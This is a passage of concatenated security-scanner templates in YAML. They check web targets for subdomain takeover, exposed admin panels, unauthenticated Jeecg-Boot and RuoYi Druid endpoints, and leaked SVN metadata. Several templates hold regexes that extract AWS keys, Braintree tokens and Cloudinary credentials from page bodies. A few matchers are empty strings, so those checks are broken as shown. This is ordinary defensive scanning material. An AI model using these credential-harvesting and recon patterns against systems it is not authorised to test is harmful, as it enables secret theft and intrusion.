8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Sorry, this page is no longer available.
--------------------------------------------------------------------------------
/aha-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: aha-takeover
2 |
3 | info:
4 | name: Aha Takeover Detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - There is no portal here ... sending you back to Aha!
--------------------------------------------------------------------------------
/aws/aws-access-key-value.yaml:
--------------------------------------------------------------------------------
1 | id: aws-access-key-value
2 |
3 | info:
4 | name: AWS Access Key ID Value
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,aws,amazon
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
19 |
--------------------------------------------------------------------------------
/braintree-access-token.yaml:
--------------------------------------------------------------------------------
1 | id: braintree-access-token
2 |
3 | info:
4 | name: PayPal Braintree Access Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,paypal
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'
18 |
--------------------------------------------------------------------------------
/c-unauthorized/jeecg-boot.yaml:
--------------------------------------------------------------------------------
1 | id: jeecg-boot-unauth
2 |
3 | info:
4 | name: Jeecg Boot Unauth
5 | author: zan8in
6 | severity: high
7 | verified: true
8 | description: |
9 | fofa: title="Jeecg-Boot"
10 |
11 | rules:
12 | r0:
13 | request:
14 | method: GET
15 | path: /jeecg-boot/
16 | expression: response.status == 200 && response.body.bcontains(b'Swagger-Bootstrap-UI')
17 | expression: r0()
--------------------------------------------------------------------------------
/c-unauthorized/ruoyi-druid-unauth.yaml:
--------------------------------------------------------------------------------
1 | id: ruoyi-druid-unauth
2 |
3 | info:
4 | name: 若依管理系统未授权访问
5 | author: Str1am
6 | severity: high
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /prod-api/druid/websession.html
14 | expression: response.status == 200 && response.body.bcontains(b'Druid Web Session Stat') && response.body.bcontains(b'Web Session Stat')
15 | expression: r0()
--------------------------------------------------------------------------------
/cloudinary-credentials.yaml:
--------------------------------------------------------------------------------
1 | id: cloudinary-credentials
2 |
3 | info:
4 | name: Cloudinary Credentials Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,cloudinary
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'
--------------------------------------------------------------------------------
/e-vulnerability/svn-leak.yaml:
--------------------------------------------------------------------------------
1 | id: svn-leak
2 |
3 | info:
4 | name: SVM 代码托管泄漏
5 | author: zan8in
6 | severity: high
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /.svn/entries
14 | expression: response.status == 200 && ("file\n".bmatches(response.body) || "dir\n".bmatches(response.body)) && "([0-9]){4}-([0-9]){2}-([0-9]){2}(.*)Z\n".bmatches(response.body)
15 | expression: r0()
--------------------------------------------------------------------------------
/empirecms-detect.yaml:
--------------------------------------------------------------------------------
1 | id: empirecms-detect
2 |
3 | info:
4 | name: EmpireCMS Detect
5 | author: princechaddha
6 | severity: info
7 | metadata:
8 | shodan-query: http.html:EmpireCMS
9 | tags: tech,empirecms
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: regex
18 | part: body
19 | regex:
20 | - ''
21 |
--------------------------------------------------------------------------------
/hmc-hybris-panel.yaml:
--------------------------------------------------------------------------------
1 | id: hmc-hybris-panel
2 |
3 | info:
4 | name: SAP Hybris Management Console
5 | author: dogasantos
6 | severity: info
7 | tags: panel,sap
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/hmc/hybris"
13 | - "{{BaseURL}}/hybris/hmc/hybris"
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - "hybris Management Console"
19 | part: body
20 |
--------------------------------------------------------------------------------
/pentaho-panel.yaml:
--------------------------------------------------------------------------------
1 | id: pentaho-panel
2 |
3 | info:
4 | name: Pentaho Panel
5 | author: princechaddha,dhiyaneshDK
6 | severity: info
7 | metadata:
8 | shodan-query: pentaho
9 | tags: panel,pentaho
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/pentaho/Login'
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - 'Pentaho User Console - Login'
20 |
--------------------------------------------------------------------------------
/perl-status.yaml:
--------------------------------------------------------------------------------
1 | id: perl-status
2 |
3 | info:
4 | name: Apache mod_perl Status Page Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure,apache,status
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/perl-status'
13 | matchers:
14 | - type: word
15 | words:
16 | - "Apache2::Status"
17 | - "Perl version"
18 | condition: and
19 |
--------------------------------------------------------------------------------
/sap-router.yaml:
--------------------------------------------------------------------------------
1 | id: sap-router
2 |
3 | info:
4 | name: SAPRouter Detection
5 | author: randomstr1ng
6 | severity: info
7 | tags: network,sap
8 |
9 | network:
10 | - inputs:
11 | - data: 57484f415245594f553f0a
12 | type: hex
13 |
14 | host:
15 | - "{{Hostname}}"
16 | - "{{Host}}:3299"
17 | read-size: 1024
18 |
19 | matchers:
20 | - type: word
21 | words:
22 | - "SAProuter"
--------------------------------------------------------------------------------
/struts-debug-mode.yaml:
--------------------------------------------------------------------------------
1 | id: struts-debug-mode
2 |
3 | info:
4 | name: Apache Struts setup in Debug-Mode
5 | author: pdteam
6 | severity: low
7 | tags: logs,struts,apache,exposure,setup
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - ""
18 | - ""
19 | condition: and
20 |
--------------------------------------------------------------------------------
/symfony/symfony-detect.yaml:
--------------------------------------------------------------------------------
1 | id: symfony-detect
2 | info:
3 | name: Detect Symfony Software
4 | author: grant
5 | severity: info
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/_fragment"
10 | matchers-condition: and
11 | matchers:
12 | - type: status
13 | status:
14 | - 403
15 | - type: word
16 | words:
17 | - "The Symfony Project"
18 | part: all
19 |
--------------------------------------------------------------------------------
/vend-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: vend-takeover
2 |
3 | info:
4 | name: vend takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Looks like you've traveled too far into cyberspace.
--------------------------------------------------------------------------------
/zentral-detection.yaml:
--------------------------------------------------------------------------------
1 | id: zentral-detection
2 |
3 | info:
4 | name: Zentral Detection
5 | author: Adam Crosser
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/'
13 | redirects: true
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - 'Zentral'
19 | - '